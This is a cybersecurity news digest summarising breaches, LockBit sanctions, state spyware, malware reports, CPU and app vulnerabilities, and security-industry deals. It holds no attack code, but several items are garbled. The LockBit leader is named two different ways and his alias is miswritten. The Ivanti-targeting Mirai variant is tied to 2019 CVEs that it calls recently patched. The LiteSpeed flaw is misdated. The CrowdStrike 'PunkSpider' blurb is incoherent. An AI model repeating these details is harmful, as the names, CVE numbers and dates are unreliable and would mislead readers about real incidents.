More News:

• Data Breaches: WebDetetive (OwnSpy), a Brazilian spyware maker, has been breached for the second time. Online health store Piping Rock has also suffered a massive data breach, exposing the information of 2.1 million customers.

• Hacking Incidents: Russian hackers have hijacked a Latvian TV station to broadcast the Kremlin's Victory Day military parade.

• Cyber Espionage: Indonesian government is using spyware to surveil its own citizens.

• Cybercrime: Seven men have been charged in the US for allegedly planting card skimmers at gas stations. A 21-year-old man has pleaded guilty to hacking-related charges for attacking DraftKings Fantasy Sports Site.

• Malware: A new variant of the Mirai botnet targets Ivanti Pulse Secure VPNs with two recently patched vulnerabilities. A surge of JavaScript-based malware has been found on WordPress sites with vulnerable versions of the LiteSpeed Cache plugin.

• Advanced Cyber Threats: Russian cyberspies have launched a spear-phishing campaign against the Polish government. North Korean hackers are using fake job interviews to infect developers with malware.

• Vulnerability Disclosure: A new side-channel attack called Pathfinder targets the conditional branch predictor (CBP) mechanism of Intel CPUs. Xiaomi apps have been found to expose devices to root access and data theft.

In a significant development, law enforcement officials have unmasked the man behind the infamous ransomware gang LockBit. The US, Britain, and Australia have imposed sanctions on Dimitri Horev, a senior Russian leader of the group.

LockBit has been a prolific ransomware operation, extorting millions of dollars from various entities worldwide. The group's unique business model involved licensing its malware code to affiliates who carried out the attacks and shared the ransom with LockBit.

The announcement of the sanctions and the unsealing of a 19-count indictment against Horev by the US Justice Department marks a major blow to the criminal organization. The indictment includes charges of conspiracy to commit fraud, extortion, and hacking, carrying a maximum penalty of 45 years in prison.

Law enforcement agencies have also offered a $10 million reward for information leading to LockBit's arrest, underscoring the high priority they have placed on dismantling this formidable threat.

Despite the pressure, LockBitUp, the alleged leader of LockBit, has denied being the man behind the ransomware gang. He has expressed a preference for a Russian prison and even invited others to join his affiliate program, remaining defiant in the face of the legal actions taken against him.

The unmasking of Dmitry Khoroshev and the subsequent sanctions and legal actions represent a significant step in the ongoing global effort to combat the growing threat of ransomware. As law enforcement agencies continue to track and disrupt the activities of LockBit and other such criminal organizations, the hope is that these measures will serve as a deterrent and protect individuals and businesses from the devastating impact of these cyberattacks.

Security Breach Trends

🚨 Dell Warns Customers of Security Breach, Exposes 49 Million Personal Details: Tech giant Dell is sending emails and notifying customers of a security breach. The company says a threat actor gained access to one of its systems and stole customer data such as names, home addresses, and past acquisitions. Dell is disclosing the breach ten days after a threat actor began selling a batch containing the personal details of 49 million Dell customers.

🚨 Brazilian Spyware Maker WebDetetive Breached Again: Hackers have breached Brazilian spyware maker WebDetetive (OwnSpy) for the second time, following a first hack in August of last year. This incident underscores the risks associated with using spyware and the need for cybersecurity best practices. The breach exposed sensitive information, including customer data, financial records, and source code. This is a wake-up call for companies to prioritize security and ethical practices in their business operations.

🚨Russian Hackers Broadcast Kremlin's Victory Day Military Parade on Balticom: Russian hackers hijacked Latvian TV station Balticom to broadcast the Kremlin's May 9 Victory Day military parade. Balticom says the hack affected a content partner in Bulgaria, and that its core network was not breached. This is the second time in a month that Russian hackers hijacked Latvian TV, after a similar incident at TV station Tet in mid-April. The incident highlights the risks of online censorship and propaganda.

🚨 Dutch Crypto Exchange Notifies Users of Security Incident: Dutch cryptocurrency exchange Bitvavo has notified users of a security breach. The incident occurred when an unauthorized party gained access to the company's systems, potentially compromising sensitive data. This is a serious incident that could potentially affect users' personal information, trading history, and wallet balances. Bitvavo has temporarily suspended trading operations to investigate and mitigate the breach.

🚨 Online Health Store Piping Rock Hit with Massive Data Breach: Online health products store Piping Rock has been the victim of a massive data breach, with the details of 2.1 million customers dumped on a hacking forum. Investigators have uncovered that the hackers behind the breach have accessed sensitive personal information, including names, addresses, phone numbers, and email addresses.

🚨 Chinese Hackers Hijack 800 Solar Power Monitoring Devices in Japan: A Chinese hacking group has hijacked more than 800 solar power generation monitoring devices across Japan. The incident took place at the start of May, and targeted devices made by Japanese company CONTEC. The hacked devices were used to conceal the hackers' identities and make illegal money transfers. This highlights the risks associated with IoT devices and the importance of cybersecurity measures.

Tech Trends & Privacy Protocols

Cybersecurity Firm Avast Fined €14M for Violating GDPR Rules: The Czech data protection agency has fined cybersecurity firm Avast €14 million for violating EU General Data Protection Regulation (GDPR) rules. The agency says Avast lied to customers on multiple counts on how it dealt with their personal data. Avast told customers it was only collecting data for statistical analysis but secretly sold it to third parties. It also lied that data would be anonymized. This is Avast's second fine for this infringement. It was also fined $16.5 million in the US earlier this year.

Policy & Governance Perspectives

📌 Indonesian Govt Uses Spyware to Surveil Its Own Citizens: An Amnesty International investigation found that the Indonesian government bought and is using surveillance tools from commercial spyware vendors. These tools include NSO Group, Candiru, FinFisher, Wintego, and Intellexa. The investigation found that these commercial spyware tools have been used by the Indonesian government to monitor and surveil its own citizens. This raises serious concerns about privacy, human rights, and the rule of law.

📌 First-of-its-kind Report Shows the US's Cybersecurity Stance: The White House has published the first version of its new Cybersecurity Posture Report, a document that highlights the US's approach to cybersecurity and outlines its current capabilities. The report provides a comprehensive overview of the US's cybersecurity posture, including its policies, strategies, and overall stance on cybersecurity. It also outlines the threats and challenges facing the country. 🔍

📌 US Organizations Received Security Alerts but Patched Devices Half the Time: The US Cybersecurity and Infrastructure Security Agency (CISA) sent 1,754 notifications about unpatched devices to organizations last year, but only 49% of vulnerable systems were patched. CISA established the Ransomware Vulnerability Warning Pilot in March last year to warn companies about unpatched devices that are commonly exploited by ransomware gangs.

Cyber Criminal Trends

🔍 US Charges Seven Men for Allegedly Planting Card Skimmers at Gas Stations: The US has charged seven men in connection with their alleged roles in a group that planted card skimmers at gas station pumps. All seven suspects are from Florida. The suspects are accused of installing skimmers at gas station pumps in various states, including Florida, Georgia, and Texas. The scheme allegedly allowed them to steal credit card information and make unauthorized purchases.

🔍 Man Pleads Guilty to Hacking DraftKings Fantasy Sports Site: A 21-year-old from Memphis, Tennessee, has pleaded guilty to hacking-related charges, according to US prosecutors. Kamerin Stokes was part of a three-man group that launched credential-stuffing attacks against DraftKings in November 2022. Stokes went online as TheMFNPlug and operated an online shop where his co-conspirators sold the hacked accounts. Authorities charged Stokes in January this year, weeks after the gang's leader was sentenced to 18 months in prison. 🔍

🔍 Symantec Team Warns of Microsoft Graph API Abuse: Broadcom's Symantec team has published an analysis of how various threat actors are now abusing the Microsoft Graph API to attack Azure-hosted infrastructure. These types of attacks were on an upward spiral, and are likely to increase in popularity. This is a serious concern as attackers can exploit the Microsoft Graph API to gain access to sensitive data, hijack accounts, and compromise Azure networks.

Malware technical reports

🔍 Lua Bytecode Hides Redline Infostealer Versions: ANY.RUN has analyzed recent versions of the Redline infostealer that have been spotted using Lua bytecode to hide itself. This is a clever way to stay under he radar and evade detection by security tools. The infostealer uses Lua bytecode to obfuscate its code, making it difficult for security tools to detect.

🔍 Mirai Botnet Variant Targets Ivanti Pulse Secure VPNs: Juniper Labs has discovered a new variant of the Mirai botnet that targets Ivanti Pulse Secure VPNs with two recently patched vulnerabilities. The vulnerabilities, CVE-2019-19791 and CVE-2019-19792, were patched in late 2019. The Mirai variant is known as "Fast Flux", and it can evade detection by using multiple IP addresses to conceal its activities. This type of botnet can be used to launch DDoS attacks, steal sensitive data, and conduct other malicious activities.

🔍 WPScan Reports Surge of JavaScript Malware on WordPress Sites: The WPScan team has published a report on a JavaScript-based malware strain they're finding on WordPress sites. The campaign can be recognized by the same admin user planted on all hacked sites – "wpsupp-user". The attacker is most likely exploiting sites that run older versions of the LiteSpeed Cache plugin. This vulnerability was patched in 2019, but some sites may still be running outdated plugins. 🔍

Advanced Cyber Threats

👉🏻 Russian Cyberspies Launch Spear-Phishing Campaign Against Polish Government: Polish cybersecurity agencies (CERT-PL and NASK) have attributed a spear-phishing campaign against the government to APT28, a Russian cyber-espionage group linked to the country's military intelligence unit. The spear-phishing campaign comes after Czechia, Germany, and Poland called out Russia's cyber-espionage operations in Europe. This latest campaign follows a similar pattern, with Russian cyberspies targeting government officials and entities.

👉🏻 Social Engineering Campaign Uses Fake Job Interviews to Infect Developers: North Korean hackers are behind a social engineering campaign targeting software developers with fake job interviews. Developers invited to interviews are asked to take tests and perform tasks that get them infected with malware. Securonix says the final payload is a Python-based remote access trojan that can be used to collect data from their systems. This is a clever and targeted attack aimed at gaining access to sensitive data and systems.

Vulnerability Disclosure Digest

🔔 Iranian Influence Operations Group, Emerald Divide, Targets Israel with Cyberattacks: Recorded Future has warned of an Iranian influence operations group, Emerald Divide (Storm-1364), that has been using the recent Israel-Hamas conflict to manipulate Israeli society and diminish trust in their own government. The group has ramped up operations after the Hamas October 7 attack, targeting Israeli public officials with cybersecurity intrusions designed to collect personal data and then doxing them on social media.

🔔 Pathfinder CPU Attack Targets Intel Processors: Academics have uncovered a new side-channel attack in the speculative execution feature of modern Intel processors. The attack is named Pathfinder and targets the conditional branch predictor (CBP) mechanism of Intel CPUs. Pathfinder is a more refined and efficient version of past attacks that targeted the same mechanism, such as Spectre or BranchSchope. 💡

🔔 Xiaomi Apps Expose Devices to Root Access and Data Theft: Security firm Oversecured has found 20 vulnerabilities impacting several Xiaomi apps. These vulnerabilities can allow root access to the device, theft of user data, and other malicious activities. Xiaomi fixed all issues within days after receiving the report, showing their commitment to security and customer privacy. However, this incident serves as a reminder that no company is immune to security flaws. 🔍

Industry Cyber Solutions

🔔 Thoma Bravo Acquires DarkTrace for $5.32 Billion: Private equity firm Thoma Bravo has acquired UK threat intelligence company DarkTrace for a whopping $5.32 billion. This is the largest acquisition in Thoma Bravo's history and a clear indicator of the growing importance of cybersecurity. DarkTrace specializes in threat detection and intelligence, providing valuable insights to companies and governments around the world. This acquisition demonstrates the growing importance of cybersecurity and the need for innovative solutions.

🔔 Congratulations to CrowdStrike on Naming a Ransomware Group...PunkSpider: CrowdStrike has named a ransomware group "PunkSpider", which is the same name as a very well-known security tool. This may seem like a stupid name, but it's actually a clever marketing ploy to attract the attention of cybercriminals and help them identify their ransomware.

🔔 Security Firm Intigriti Launches Tool to Find, Detect and Resolve Common Security Misconfigurations: Intigriti, a security firm, has open-sourced Misconfig Mapper, a tool to find, detect and resolve common security misconfigurations in various popular services, technologies and SaaS-based solutions. The tool supports the likes of Jira, Drupal, GitLab, Jenkins, Laravel, GraphQL, and others, making it a valuable resource for security experts and researchers.

Stay informed about the latest cybersecurity threats and take steps to protect your personal information and online activities. Subscribe to our newsletter and get the scoop on the most important stories, straight to your inbox.

Subscribe to Premium Membership to read the rest.